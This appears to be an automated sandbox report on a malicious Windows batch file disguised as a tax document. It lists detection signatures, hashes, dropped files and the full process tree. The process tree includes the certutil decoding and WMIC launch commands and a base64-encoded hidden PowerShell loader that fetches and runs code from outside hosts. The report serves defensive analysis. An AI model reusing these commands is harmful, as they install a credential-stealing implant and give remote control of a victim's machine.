Overview

overview

8

Static

static

doc-Impostos.cmd

windows7-x64

8

doc-Impostos.cmd

windows10-2004-x64

8

Analysis

  • max time kernel
    121s
  • max time network
    123s
  • platform
    windows7_x64
  • resource
    win7-20221111-en
  • resource tags

    arch:x64arch:x86image:win7-20221111-enlocale:en-usos:windows7-x64system
  • submitted
    02/01/2023, 13:05

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    doc-Impostos.cmd

  • Size

    1.4MB

  • MD5

    c76daaa1b0caaf00f820581c3d848581

  • SHA1

    279e002d57cf3dfa1faa4a5d22d77c6b29fe9f6c

  • SHA256

    7ff62cc43a03065fe50371080e849b0779cb0f1ec308b24eca6b5ce1bf6b6ad3

  • SHA512

    01f8a45568d0b508d09609e0659bb332a3509944039208bfc9ca18f66a63a179a7119aad54d92a514cb3962d3801459f3a527984a2e4c4c6b30063e1a55ec471

  • SSDEEP

    24576:0b0FVefPot0YZeHsCrhGbfAjespJNj5e1byXc628L:to45oeuIQtL

Score
8/10
collectionspywarestealer

Malware Config

Signatures

  • Blocklisted process makes network request 2 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 1 IoCs
  • Deletes itself 1 IoCs
  • Drops startup file 2 IoCs
  • Loads dropped DLL 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
    collection
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Delays execution with timeout.exe 1 IoCs
    evasion
  • NTFS ADS 1 IoCs
  • Script User-Agent 3 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 42 IoCs
  • Suspicious use of FindShellTrayWindow 19 IoCs
  • Suspicious use of SendNotifyMessage 19 IoCs
  • Suspicious use of WriteProcessMemory 25 IoCs
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\doc-Impostos.cmd"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2012
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\doc-Impostos.cmd"
      2⤵
      • Deletes itself
      • Suspicious use of WriteProcessMemory
      PID:1712
      • C:\Windows\system32\more.com
        more +5 C:\Users\Admin\AppData\Local\Temp\doc-Impostos.cmd
        3⤵
          PID:1556
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command "(gc ~~) -replace '>', '' | Out-File -encoding ASCII ~~"
          3⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:472
        • C:\Windows\system32\certutil.exe
          certutil -decode -f ~~ "C:\Users\Admin\AppData\Roaming\glover\exe\vmiddleton\whitaker.exe"
          3⤵
            PID:1128
          • C:\Windows\system32\certutil.exe
            certutil -decode -f C:\Users\Admin\AppData\Local\Temp\doc-Impostos.cmd "C:\Users\Admin\AppData\Roaming\glover\a3x\wrenn\doc-Impostos.a3x"
            3⤵
              PID:2000
            • C:\Windows\System32\Wbem\WMIC.exe
              wmic process call create '"C:\Users\Admin\AppData\Roaming\glover\exe\vmiddleton\whitaker.exe" "C:\Users\Admin\AppData\Roaming\glover\a3x\wrenn\doc-Impostos.a3x" ""' ,C:\Users\Admin\AppData\Local\Temp\
              3⤵
              • Suspicious use of AdjustPrivilegeToken
              PID:1264
            • C:\Windows\system32\timeout.exe
              timeout /T 5
              3⤵
              • Delays execution with timeout.exe
              PID:968
        • C:\Users\Admin\AppData\Roaming\glover\exe\vmiddleton\whitaker.exe
          "C:\Users\Admin\AppData\Roaming\glover\exe\vmiddleton\whitaker.exe" "C:\Users\Admin\AppData\Roaming\glover\a3x\wrenn\doc-Impostos.a3x" ""
          1⤵
          • Executes dropped EXE
          • Drops startup file
          • Loads dropped DLL
          • Accesses Microsoft Outlook profiles
          • NTFS ADS
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of SendNotifyMessage
          • Suspicious use of WriteProcessMemory
          • outlook_office_path
          • outlook_win_path
          PID:992
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden -ExecutionPolicy UnRestricted -Encoded JABLAFUAcQBMAFAAZAByAFAAIAA9ACAAKAAiAGgAdAB0AHAAOgAvAC8AbQBvAHMAYwBvAHcAawBvAHYALgB4AHkAegAvAHMAeQBzAC8APwBoAD0ANAAwAEQANgAwADYAMwAxACIALAAgACIAaAB0AHQAcAA6AC8ALwBtAG8AcwBjAG8AdwBrAG8AdgAuAGEAdAAvAHMAeQBzAC8APwBoAD0ANAAwAEQANgAwADYAMwAxACIAKQA7AGYAbwByACgAOwA7ACkAewBmAG8AcgBlAGEAYwBoACgAJABCAEsAcABDAFEAIABpAG4AIAAkAEsAVQBxAEwAUABkAHIAUAApAHsAdAByAHkAewAkAGcATABhAEkAbQBHAFcAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAUgBlAHEAdQBlAHMAdABdADoAOgBDAHIAZQBhAHQAZQAoACQAQgBLAHAAQwBRACkAOwAkAHoAQwBDAG8AdABOAEYAIAA9ACAAJABnAEwAYQBJAG0ARwBXAC4ARwBlAHQAUgBlAHMAcABvAG4AcwBlACgAKQA7ACQAZwBMAGEASQBtAEcAVwBzAHQAcgBlAGEAbQAgAD0AIAAkAHoAQwBDAG8AdABOAEYALgBHAGUAdABSAGUAcwBwAG8AbgBzAGUAUwB0AHIAZQBhAG0AKAApADsAJABzAHQAcgBlAGEAbQAgAD0AIABuAGUAdwAtAG8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAgACQAZwBMAGEASQBtAEcAVwBzAHQAcgBlAGEAbQA7ACQAeABPAFoAYwBLAGsATwAgAD0AIAAkAHMAdAByAGUAYQBtAC4AUgBlAGEAZABUAG8ARQBuAGQAKAApADsAVwByAGkAdABlAC0ATwB1AHQAcAB1AHQAIAAkAHgATwBaAGMASwBrAE8AOwB0AHIAeQB7AEkARQBYACAAJAB4AE8AWgBjAEsAawBPADsAfQBjAGEAdABjAGgAewB9AFcAcgBpAHQAZQAtAE8AdQB0AHAAdQB0ACAAIgA2ADAAIgA7AFMAdABhAHIAdAAtAFMAbABlAGUAcAAgAC0AUwBlAGMAbwBuAGQAcwAgADYAMAA7AGIAcgBlAGEAawA7AH0AYwBhAHQAYwBoAHsAVwByAGkAdABlAC0ATwB1AHQAcAB1AHQAIAAiAGUAIgA7AH0AfQBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAxADAAOwB9AA==
            2⤵
            • Blocklisted process makes network request
            • Drops startup file
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:864

        Network

        MITRE ATT&CK Enterprise v6

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\Local\Temp\~~
          Filesize

          1.4MB

          MD5

          f048ee2c96103015e19d9d4e41a1adbc

          SHA1

          c531744376c0a64329b5a9c7e35765b3eb03a60b

          SHA256

          4d10b7047b6334ea5d9ec2f5db44583b18d4c85de584323e425eb47360acc43c

          SHA512

          ca2570f7f9f60457fc0a8133118d609ab093db99d4fc86f915488215abf1adc7f28ac3b2388d6192d2b1b42c931676fd39785894e3edb771b77979006f6bcb16

          Download Submit

        • C:\Users\Admin\AppData\Local\Temp\~~
          Filesize

          1.3MB

          MD5

          fb8da432cd6b0e8117c141688b17bda4

          SHA1

          82bc9bb64e960fda81cb0900b0dc3d24fea77325

          SHA256

          f532a1653ef1d202b14cb7d795efc331b6d985681a9ab8d442cef404fc451f5a

          SHA512

          f9738096b7aa56f655be0aef3e00bc10b6f1f9f6d622d61fabb2efce264bb6c6ba361183d5e773afb043f8d69a89c9341cbaaddd6aeccff57826abeed9087f63

          Download Submit

        • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DriverAudio.lnk
          Filesize

          4KB

          MD5

          32dabc97be5028fb6da5786fae16d636

          SHA1

          5577d5041835996aff43dc3afe16a74a1278a9bf

          SHA256

          b1034dff677d59028bd89571c2bbf772dc31af29e76804e9763c3cb5cdf09126

          SHA512

          ed3ea06f629cdeedbf8db6a3623449001fcca8e89c38dcf8d301158f97b3ded92b303763cfe3c84bdaee0e9550b42829842ff7098385e444e70a2785963f6adf

          Download Submit

        • C:\Users\Admin\AppData\Roaming\glover\a3x\wrenn\doc-Impostos.a3x
          Filesize

          115KB

          MD5

          bfb28cda03f6b0e1df19176614772d75

          SHA1

          a64ef88d61e7dfae057f161cfb57a762c8afc9db

          SHA256

          5a679cab55d3f050e304ab0cf2ee28ce8e4f70cc355bb349ed97aa5d6ad9a2e3

          SHA512

          333f1538045a7a50692041208464526e0feb825b75469bb16ca4ebf3b0a1cc05720f9b0ef07edc69fede52f907e1fcc1945183a881a85825e0041d0bbac747b3

          Download Submit

        • C:\Users\Admin\AppData\Roaming\glover\exe\VMIDDL~1\whitaker.exe
          Filesize

          872KB

          MD5

          c56b5f0201a3b3de53e561fe76912bfd

          SHA1

          2a4062e10a5de813f5688221dbeb3f3ff33eb417

          SHA256

          237d1bca6e056df5bb16a1216a434634109478f882d3b1d58344c801d184f95d

          SHA512

          195b98245bb820085ae9203cdb6d470b749d1f228908093e8606453b027b7d7681ccd7952e30c2f5dd40f8f0b999ccfc60ebb03419b574c08de6816e75710d2c

          Download Submit

        • C:\Users\Admin\AppData\Roaming\glover\exe\vmiddleton\whitaker.exe
          Filesize

          872KB

          MD5

          c56b5f0201a3b3de53e561fe76912bfd

          SHA1

          2a4062e10a5de813f5688221dbeb3f3ff33eb417

          SHA256

          237d1bca6e056df5bb16a1216a434634109478f882d3b1d58344c801d184f95d

          SHA512

          195b98245bb820085ae9203cdb6d470b749d1f228908093e8606453b027b7d7681ccd7952e30c2f5dd40f8f0b999ccfc60ebb03419b574c08de6816e75710d2c

          Download Submit

        • \Users\Admin\AppData\Local\Temp\sqlite3.dll
          Filesize

          858KB

          MD5

          c7719f774bb859240eb6dfa91a1f10be

          SHA1

          be1461e770333eb13e0fe66d378e3fac4f1112b5

          SHA256

          b3ce811fb696b94f9117ee7fe725ae6b907d695636beceeb1672d5d5eeb81df4

          SHA512

          8a561e927a7a65f5211c76b488bed2a3cc0525ecd9775d25e1863b52ff532349c125b76a51eb63ea2e4479a567e8fac6b8ae38b7fd1970bad2556befe9e3b529

          Download Submit

        • memory/472-64-0x00000000027A4000-0x00000000027A7000-memory.dmp

          Filesize

          12KB

          Download

        • memory/472-61-0x000000001B6F0000-0x000000001B9EF000-memory.dmp

          Filesize

          3.0MB

          Download

        • memory/472-63-0x00000000027AB000-0x00000000027CA000-memory.dmp

          Filesize

          124KB

          Download

        • memory/472-58-0x000007FEF3450000-0x000007FEF3E73000-memory.dmp

          Filesize

          10.1MB

          Download

        • memory/472-65-0x00000000027AB000-0x00000000027CA000-memory.dmp

          Filesize

          124KB

          Download

        • memory/472-60-0x00000000027A4000-0x00000000027A7000-memory.dmp

          Filesize

          12KB

          Download

        • memory/472-57-0x000007FEFB7B1000-0x000007FEFB7B3000-memory.dmp

          Filesize

          8KB

          Download

        • memory/472-59-0x000007FEF28F0000-0x000007FEF344D000-memory.dmp

          Filesize

          11.4MB

          Download

        • memory/864-81-0x0000000072F70000-0x000000007351B000-memory.dmp

          Filesize

          5.7MB

          Download

        • memory/864-82-0x0000000072F70000-0x000000007351B000-memory.dmp

          Filesize

          5.7MB

          Download

        • memory/992-74-0x00000000760C1000-0x00000000760C3000-memory.dmp

          Filesize

          8KB

          Download

        • memory/1128-67-0x00000000FFA01000-0x00000000FFA03000-memory.dmp

          Filesize

          8KB

          Download

        • memory/2000-70-0x00000000FF391000-0x00000000FF393000-memory.dmp

          Filesize

          8KB

          Download